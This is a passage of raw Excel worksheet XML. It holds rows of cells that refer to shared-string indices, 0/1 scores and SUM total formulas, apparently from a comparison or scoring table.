      <c r="A30" s="3" t="s">
        <v>1382</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>1383</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>1384</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>1385</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>1400</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>1386</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>1295</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>1387</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>1323</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>1146</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>65</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1165</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>0</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1173</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A34" s="3"/>
      <c r="B34" s="3" t="s">
        <v>1407</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>1389</v>
      </c>
      <c r="D34" s="19">
        <v>1</v>
      </c>
      <c r="E34" s="19">
        <v>0</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>1401</v>
      </c>
      <c r="G34" s="19">
        <v>1</v>
      </c>
      <c r="H34" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>1388</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>1406</v>
      </c>
      <c r="D35">
        <v>0</v>
      </c>
      <c r="E35">
        <v>0</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>65</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>1390</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>1391</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1391</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1402</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>1392</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1393</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1393</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1393</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A38" s="3"/>
      <c r="B38" s="3" t="s">
        <v>1408</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>1408</v>
      </c>
      <c r="D38" s="19">
        <v>1</v>
      </c>
      <c r="E38" s="19">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1408</v>
      </c>
      <c r="G38" s="19">
        <v>1</v>
      </c>
      <c r="H38" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A39" s="3"/>
      <c r="B39" s="3" t="s">
        <v>1409</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>1410</v>
      </c>
      <c r="D39" s="19">
        <v>1</v>
      </c>
      <c r="E39" s="19">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>1410</v>
      </c>
      <c r="G39" s="19">
        <v>1</v>
      </c>
      <c r="H39" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>1394</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1190</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A41" s="3"/>
      <c r="B41" s="3" t="s">
        <v>1411</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1396</v>
      </c>
      <c r="D41" s="19">
        <v>0</v>
      </c>
      <c r="E41" s="19">
        <v>0</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1908</v>
      </c>
      <c r="G41" s="19">
        <v>1</v>
      </c>
      <c r="H41" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>1395</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="D42">
        <v>0</v>
      </c>
      <c r="E42">
        <v>0</v>
      </c>
      <c r="G42">
        <v>0</v>
      </c>
      <c r="H42">
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:8" ht="96.6" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>1397</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>1398</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1399</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1403</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A44" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D44" s="6">
        <f>SUM(D25:D43)</f>
        <v>16</v>
      </c>
      <c r="E44" s="6">
        <f t="shared" ref="E44:H44" si="1">SUM(E25:E43)</f>
        <v>14</v>
      </c>
      <c r="F44" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G44" s="6">
        <f t="shared" si="1"/>
        <v>18</v>
      </c>
      <c r="H44" s="6">
        <f t="shared" si="1"/>
        <v>14</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A23:H2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4D315-C3D5-46A7-9ACC-8B23E3DBFA5E}">
  <dimension ref="A1:H56"/>
  <sheetViews>
    <sheetView topLeftCell="A54" workbookViewId="0">
      <selection activeCell="F57" sqref="F57"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.6640625" customWidth="1"/>
    <col min="2" max="2" width="26.77734375" customWidth="1"/>
    <col min="3" max="3" width="28" customWidth="1"/>
    <col min="4" max="4" width="10.88671875" customWidth="1"/>
    <col min="5" max="5" width="10.6640625" customWidth="1"/>
    <col min="6" max="6" width="28.109375" customWidth="1"/>
    <col min="7" max="7" width="10.33203125" customWidth="1"/>
    <col min="8" max="8" width="10.88671875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="27.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>356</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ht="96.6" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>357</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>358</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>366</v>
      </c>
      <c r="D4">
        <v>0</v>
      </c>
      <c r="E4">
        <v>0</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>358</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>359</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>26</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>360</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>329</v>
      </c>
      <c r="B7" s="3"/>
      <c r="C7" s="3"/>
      <c r="F7" s="3"/>
    </row>
    <row r="8" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>361</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>331</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>368</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>331</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>362</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>333</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>367</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>0</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>354</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>334</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>37</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>0</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>335</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>336</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>336</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>336</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>337</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>338</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>339</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>351</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>339</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>115</v>
      </c>
      <c r="D14">
        <v>0</v>
      </c>
      <c r="E14">
        <v>0</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>116</v>
      </c>
      <c r="G14">
        <v>0</v>
      </c>
      <c r="H14">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>334</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>36</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>340</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>341</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>341</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>341</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>337</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>342</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>343</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>352</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>343</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>363</v>
      </c>
      <c r="B19" s="3"/>
      <c r="C19" s="3"/>
      <c r="F19" s="3"/>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>364</v>
      </c>
      <c r="B20" s="3"/>
      <c r="C20" s="3"/>
      <c r="F20" s="3"/>
    </row>
    <row r="21" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>365</v>
      </c>
      <c r="B21" s="3"/>
      <c r="C21" s="3"/>
      <c r="F21" s="3"/>
    </row>
    <row r="22" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A22" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D22" s="6">
        <f>SUM(D4:D18)</f>
        <v>12</v>
      </c>
      <c r="E22" s="6">
        <f t="shared" ref="E22:H22" si="0">SUM(E4:E18)</f>
        <v>10</v>
      </c>
      <c r="F22" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G22" s="6">
        <f t="shared" si="0"/>
        <v>13</v>
      </c>
      <c r="H22" s="6">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A25" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B25" s="25"/>
      <c r="C25" s="25"/>
      <c r="D25" s="25"/>
      <c r="E25" s="25"/>
      <c r="F25" s="25"/>
      <c r="G25" s="25"/>
      <c r="H25" s="25"/>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A26" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B26" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C26" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D26" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E26" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F26" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G26" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H26" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="27" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A29" s="3"/>
      <c r="B29" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>59</v>
      </c>
      <c r="D29" s="19">
        <v>1</v>
      </c>
      <c r="E29" s="19">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>59</v>
      </c>
      <c r="G29" s="19">
        <v>1</v>
      </c>
      <c r="H29" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>1412</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>1060</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A31" s="3"/>
      <c r="B31" s="3" t="s">
        <v>61</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>61</v>
      </c>
      <c r="D31" s="19">
        <v>1</v>
      </c>
      <c r="E31" s="19">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>61</v>
      </c>
      <c r="G31" s="19">
        <v>1</v>
      </c>
      <c r="H31" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>1413</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>1122</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A33" s="3"/>
      <c r="B33" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C33" s="9" t="s">
        <v>1447</v>
      </c>
      <c r="D33" s="19">
        <v>1</v>
      </c>
      <c r="E33" s="19">
        <v>0</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1447</v>
      </c>
      <c r="G33" s="19">
        <v>1</v>
      </c>
      <c r="H33" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>1414</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>1445</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>1446</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>1448</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A35" s="3"/>
      <c r="B35" s="3" t="s">
        <v>1189</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1198</v>
      </c>
      <c r="D35" s="19">
        <v>1</v>
      </c>
      <c r="E35" s="19">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1198</v>
      </c>
      <c r="G35" s="19">
        <v>1</v>
      </c>
      <c r="H35" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A36" s="3"/>
      <c r="B36" s="3" t="s">
        <v>1449</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1453</v>
      </c>
      <c r="D36" s="19">
        <v>1</v>
      </c>
      <c r="E36" s="19">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1453</v>
      </c>
      <c r="G36" s="19">
        <v>1</v>
      </c>
      <c r="H36" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A37" s="3"/>
      <c r="B37" s="3" t="s">
        <v>1450</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1450</v>
      </c>
      <c r="D37" s="19">
        <v>1</v>
      </c>
      <c r="E37" s="19">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1450</v>
      </c>
      <c r="G37" s="19">
        <v>1</v>
      </c>
      <c r="H37" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A38" s="3"/>
      <c r="B38" s="3" t="s">
        <v>1452</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>1454</v>
      </c>
      <c r="D38" s="19">
        <v>1</v>
      </c>
      <c r="E38" s="19">
        <v>0</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>1455</v>
      </c>
      <c r="G38" s="19">
        <v>1</v>
      </c>
      <c r="H38" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" ht="96.6" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>1415</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>1451</v>
      </c>
      <c r="C39" s="9"/>
      <c r="D39">
        <v>0</v>
      </c>
      <c r="E39">
        <v>0</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>1456</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>1416</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>1417</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1434</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1434</v>
      </c>
      <c r="G40">
        <v>1</v>
      </c>
      <c r="H40">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A41" s="3"/>
      <c r="B41" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1063</v>
      </c>
      <c r="D41" s="19">
        <v>1</v>
      </c>
      <c r="E41" s="19">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1093</v>
      </c>
      <c r="G41" s="19">
        <v>1</v>
      </c>
      <c r="H41" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>1418</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>1457</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>1263</v>
      </c>
      <c r="G42">
        <v>1</v>
      </c>
      <c r="H42">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>1419</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>1420</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1435</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1440</v>
      </c>
      <c r="G43">
        <v>1</v>
      </c>
      <c r="H43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>1421</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1422</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1436</v>
      </c>
      <c r="D44">
        <v>1</v>
      </c>
      <c r="E44">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1441</v>
      </c>
      <c r="G44">
        <v>1</v>
      </c>
      <c r="H44">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>1423</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>1424</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1424</v>
      </c>
      <c r="D45">
        <v>1</v>
      </c>
      <c r="E45">
        <v>1</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1424</v>
      </c>
      <c r="G45">
        <v>1</v>
      </c>
      <c r="H45">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>1425</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>1426</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>1426</v>
      </c>
      <c r="D46">
        <v>1</v>
      </c>
      <c r="E46">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>1442</v>
      </c>
      <c r="G46">
        <v>1</v>
      </c>
      <c r="H46">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A47" s="3" t="s">
        <v>1427</v>
      </c>
      <c r="B47" s="3" t="s">
        <v>1428</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>1437</v>
      </c>
      <c r="D47">
        <v>1</v>
      </c>
      <c r="E47">
        <v>1</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>1443</v>
      </c>
      <c r="G47">
        <v>1</v>
      </c>
      <c r="H47">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A48" s="3" t="s">
        <v>1429</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>1430</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>1438</v>
      </c>
      <c r="D48">
        <v>1</v>
      </c>
      <c r="E48">
        <v>1</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>1444</v>
      </c>
      <c r="G48">
        <v>1</v>
      </c>
      <c r="H48">
        <v>1</v>
      </c>
    </row>
    <row r="49" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A49" s="3"/>
      <c r="B49" s="3" t="s">
        <v>1458</v>
      </c>
      <c r="C49" s="3" t="s">
